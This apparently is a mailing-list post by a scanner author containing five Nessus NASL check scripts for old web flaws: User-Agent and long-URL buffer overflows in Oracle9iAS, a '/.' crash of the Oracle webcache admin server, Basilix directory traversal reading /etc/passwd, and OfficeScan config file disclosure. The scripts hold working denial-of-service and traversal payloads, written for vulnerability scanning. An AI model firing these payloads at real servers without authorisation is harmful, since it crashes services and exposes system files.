
A few HTTP attacks
BTW, it seems that we do not have any generic HTTP Cookie overflow test.
Does anybody know a vulnerable server?

Does anybody know how to extract the version number from the Oracle9iAS
banner?







#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# Date: Thu, 18 Oct 2001 16:16:20 +0200
# From: "andreas junestam" <andreas.junestam@defcom.com>
# Affiliation: Defcom
# To: "bugtraq" <bugtraq@securityfocus.com>
# Subject: def-2001-30
#
# Affected:
# Oracle9iAS Web Cache/2.0.0.1.0
#


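if(description)
{
# script_id(TBD);
script_version ("$Revision$");
name["english"] = "HTTP User-Agent overflow";
script_name(english:name["english"]);

# Report shown to the user. Typo fix only ("arbirtray" -> "arbitrary" and
# the missing full stop after "field"); the wording is otherwise unchanged.
desc["english"] = "It was possible to kill the web server by
sending an invalid GET request with a too long User-Agent field.

A cracker may exploit this vulnerability to make your web server
crash continually or even execute arbitrary code on your system.

Solution : upgrade your software or protect it with a filtering reverse proxy
Risk factor : High";

script_description(english:desc["english"]);

summary["english"] = "Too long User-Agent kills the web server";
script_summary(english:summary["english"]);

# The attack part of this script crashes the target, so it is skipped
# when "safe checks" are enabled (see the code after this block).
script_category(ACT_MIXED_ATTACK);

script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Gain root remotely";
family["francais"] = "Passer root à distance";
script_family(english:family["english"], francais:family["francais"]);
script_require_ports("Services/www", 80);
exit(0);
}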

########

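# This check crashes the target on purpose: never run it when the user
# asked for safe checks only.
if (safe_checks()) exit(0);

# http_is_alive() lives in this include.
include("http_func.inc");

port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);

# Make sure the server answers an HTTP request *before* the attack:
# otherwise a server that was already down, hung or firewalled would be
# reported as crashed by us (false positive).
if(! http_is_alive(port: port)) exit(0);

# Need at least 4000 for Oracle Web
req = string("GET / HTTP/1.0\r\nUser-Agent: ", crap(4000), "\r\n\r\n");

soc = http_open_socket(port);
if(! soc) exit(0);

send(socket:soc, data: req);
# The answer (if any) is irrelevant: only the survival of the server matters.
r = recv(socket:soc, length:4096);
close(soc);

# Give the server a little time to die (or to recover) before probing again.
sleep(1);

# Same probe as before the attack. A real HTTP exchange is used rather than
# a bare TCP connect, so a server that still accepts connections but no
# longer answers is caught too.
if(! http_is_alive(port: port)) security_hole(port);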



#
# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# GPL
#
# References:
# Date: Thu, 18 Oct 2001 16:16:20 +0200
# From: "andreas junestam" <andreas.junestam@defcom.com>
# Affiliation: Defcom
# To: "bugtraq" <bugtraq@securityfocus.com>
# Subject: def-2001-30
#
# Affected:
# Oracle9iAS Web Cache/2.0.0.1.0
#

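if(description)
{
#script_id(TBD);
script_version ("$Revision$");

name["english"] = "Oracle9iAS too long URL";
name["francais"] = "URL trop longue contre Oracle9iAS";
script_name(english:name["english"], francais:name["francais"]);

# Report shown to the user. The original text read "a too long url
# specially crafted URL" (two drafts merged); only that sentence was fixed.
desc["english"] = "
It may be possible to make the Oracle9i application server
crash or execute arbitrary code by sending it a specially
crafted, too long URL.

Risk factor : High

Solution : Upgrade your server.";

script_description(english:desc["english"]);

summary["english"] = "Oracle9iAS buffer overflow";
script_summary(english:summary["english"]);

# The attack part crashes the target: it only runs when safe checks are off.
script_category(ACT_MIXED_ATTACK);


script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
francais:"Ce script est Copyright (C) 2002 Michel Arboi");
family["english"] = "Gain root remotely";
family["francais"] = "Passer root à distance";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("find_service.nes");
# 1100 is the default used by the code below; 4000-4002 are the other
# ports this check is willing to run against.
script_require_ports("Services/www",1100, 4000, 4001, 4002);
exit(0);
}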

#

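# Disruptive check (it crashes the server): obey the "safe checks" setting.
if(safe_checks())
{
 exit(0);
}

# http_is_alive() comes from this include; pull it in before any use
# instead of in the middle of the script.
include("http_func.inc");

port = get_kb_item("Services/www");
if(!port)port = 1100;
if (! get_port_state(port)) exit(0);

# Do not report a server that was already dead (or unreachable) before we
# touched it: that would be a false positive.
if (! http_is_alive(port: port)) exit(0);

# 3095 'A' followed by 4 'N' - the lengths presumably come from the Defcom
# advisory cited in the header (see also the note at the end of the script).
url = string("/", crap(data: "A", length: 3095), crap(data: "N", length: 4));

soc = open_sock_tcp(port);
if (! soc) exit(0);

r = http_get(item: url, port: port);

send(socket:soc, data:r);
# The reply is not interesting; only the survival of the server matters.
a = recv(socket: soc, length: 4096);
close(soc);

# Let the server die (or recover) before probing it again.
sleep(1);

if(! http_is_alive(port: port)) {
 security_hole(port);
 # Tell later web checks that this server is gone.
 set_kb_item(name:"www/too_long_url_crash", value:TRUE);
 exit(0);
}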

# Note: sending 'GET /<3571 x A> HTTP/1.0' will kill it too.



#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# Date: Thu, 18 Oct 2001 16:16:20 +0200
# From: "andreas junestam" <andreas.junestam@defcom.com>
# Affiliation: Defcom
# To: "bugtraq" <bugtraq@securityfocus.com>
# Subject: def-2001-30
#
# Affected:
# Oracle9iAS Web Cache/2.0.0.1.0
#


if(description)
{
# script_id(TBD);
script_version ("$Revision$");

# Name, report text and one-line summary of this check, passed directly
# rather than through intermediate arrays.
script_name(english:"Oracle webcache admin interface");

script_description(english:"It was possible to kill the web server by
requesting '/.'

A cracker may exploit this vulnerability to make your web server
crash continually.

Solution : upgrade your software or protect it with a filtering reverse proxy
Risk factor : Low");

script_summary(english:"Get /. crashes Oracle webcache admin");

# Pure denial of service: nothing is gathered, the target is just crashed.
script_category(ACT_DENIAL);

script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
script_family(english:"Denial of Service", francais:"Déni de service");

# Port 4000 is also the default the attack code falls back to.
script_require_ports("Services/www", 4000);
exit(0);
}

########

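# Disruptive check (it crashes the admin server): skip it under safe checks.
if (safe_checks()) exit(0);

# http_is_alive() lives in this include.
include("http_func.inc");

port = get_kb_item("Services/www");
if(!port) port = 4000;
if(! get_port_state(port)) exit(0);

# A server that does not answer before the attack must not be reported as
# killed by it (it may already be down, hung or firewalled).
if(! http_is_alive(port: port)) exit(0);

soc = http_open_socket(port);
if(! soc) exit(0);

# The advisory says "GET /. HTTP/1.0" - should we only try this HTTP/1.0
# request? http_get() builds the request for us; whether the HTTP version
# matters for this bug is not known.
req = http_get(port: port, item: "/.");

send(socket:soc, data: req);
# The reply itself is not interesting, only whether the server survives.
r = recv(socket:soc, length:4096);
close(soc);

# Let the process die (or recover) before the second probe.
sleep(1);

# Same probe as before the attack: no HTTP answer now means the server
# was killed by the "/." request.
if(! http_is_alive(port: port)) security_hole(port);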



#
# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# GPL
#
# References:
# From: "karol _" <su@poczta.arena.pl>
# To: bugtraq@securityfocus.com
# CC: arslanm@Bilkent.EDU.TR
# Date: Fri, 06 Jul 2001 21:04:55 +0200
# Subject: basilix bug
#


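if(description)
{
#script_id(TBD);
script_version ("$Revision$");
#script_cve_id("TBD");
name["english"] = "Basilix webmail dummy request vulnerability";
script_name(english:name["english"]);

desc["english"] = "
basilix.php3 is installed on this web server. Some versions
of this webmail software allow the users to read any file on
the system with the permission of the webmail software, and
execute any PHP.

Solution : Update Basilix or remove DUMMY from lang.inc

Risk factor : Low";



script_description(english:desc["english"]);

summary["english"] = "Checks for the presence of basilix.php3";
summary["francais"] = "Vérifie la présence de basilix.php3";

script_summary(english:summary["english"], francais:summary["francais"]);

# The request only reads a file; nothing is crashed.
script_category(ACT_GATHER_INFO);


script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
francais:"Ce script est Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
# Fixed: the closing quote after "no404.nasl" was missing, which made this
# line a syntax error. logins.nasl presumably fills the http/login and
# http/password KB items read by the attack code below.
script_dependencie("find_service.nes", "no404.nasl", "logins.nasl");
script_require_ports("Services/www", 80);
exit(0);
}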

# The script code starts here

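port = get_kb_item("Services/www");
if (! port) port = 80;
if (! get_port_state(port)) exit(0);

# Use the web login stored in the KB if there is one, dummy values otherwise.
user = get_kb_item("http/login");
pass = get_kb_item("http/password");
if (! user) user="blah";
if (! pass) pass="blah";

soc = open_sock_tcp(port);
if (! soc) exit(0);

# Directory traversal through the request_id[DUMMY] parameter; a vulnerable
# Basilix returns the named file, here /etc/passwd.
url=string("/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=", user, "&password=", pass);
req = http_get(port: port, item: url);

send(socket: soc, data: req);
status = recv_line(socket: soc, length: 512);
# Read the body too: a "200" status alone proves nothing, since a server
# that answers 200 to any URL (or Basilix showing its login page) would
# trigger a false positive.
body = recv(socket: soc, length: 65535);
close(soc);

# Only a passwd-looking body demonstrates the file disclosure.
if (" 200" >< status && egrep(pattern: "root:.*:0:[01]:", string: body))
{
 security_hole(port);
 exit(0);
}

# Otherwise just warn that a possibly vulnerable Basilix is installed.
if (is_cgi_installed(port: port, item: "/basilix.php3")) security_warning(port);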




#
# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# GPL
#
# References :
# Date: Tue, 16 Oct 2001 11:34:56 +0900
# From: "snsadv@lac.co.jp" <snsadv@lac.co.jp>
# To: bugtraq@securityfocus.com
# Subject: [SNS Advisory No.44] Trend Micro OfficeScan Corporate Edition
# (Virus Buster Corporate Edition) Configuration File Disclosure Vulnerability
#

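if(description)
{
#script_id(TBD);
script_version ("$Revision$");

name["english"] = "OfficeScan configuration file disclosure";
name["francais"] = "OfficeScan révèle son fichier de configuration";
script_name(english:name["english"], francais:name["francais"]);

desc["english"] = "
Trend Micro OfficeScan Corporate Edition (Japanese version: Virus
Buster Corporate Edition) web-based management console let anybody
access /officescan/hotdownload without authentication.

Reading the configuration file /officescan/hotdownload/ofcscan.ini
will reveal information on your system. More, it contains passwords
that are encrypted by a weak specific algorithm; so they might be
decrypted

Solution : upgrade OfficeScan
Risk factor : Low";


script_description(english:desc["english"]);

# Fixed: the summary named "ofscan.ini" while the description (and the
# file the check requests) is ofcscan.ini.
summary["english"] = "Checks for the presence of /officescan/hotdownload/ofcscan.ini";
summary["francais"] = "Vérifie la présence de /officescan/hotdownload/ofcscan.ini";

script_summary(english:summary["english"], francais:summary["francais"]);

# A single GET request; nothing is crashed.
script_category(ACT_GATHER_INFO);


script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
francais:"Ce script est Copyright (C) 2002 Michel Arboi");
family["english"] = "CGI abuses";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("find_service.nes", "no404.nasl");
script_require_ports("Services/www", 80);
exit(0);
}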

# The script code starts here

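port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);

soc = open_sock_tcp(port);
if (! soc) exit(0);

# The configuration file is ofcscan.ini, as stated in the description
# above; the request used to ask for "ofscan.ini", a file that even a
# vulnerable server would not serve, so the check could never fire.
req = http_get(port: port, item: "/officescan/hotdownload/ofcscan.ini");
send(socket: soc, data: req);
r = recv_line(socket: soc, length: 512);
close(soc);

# A 200 answer means the file was served without any authentication.
# NOTE(review): no404.nasl is declared as a dependency but its result is
# not consulted here, so a server answering 200 to any URL would still be
# reported - TODO check that KB entry before trusting the status alone.
if (" 200" >< r) { security_hole(port); exit(0); }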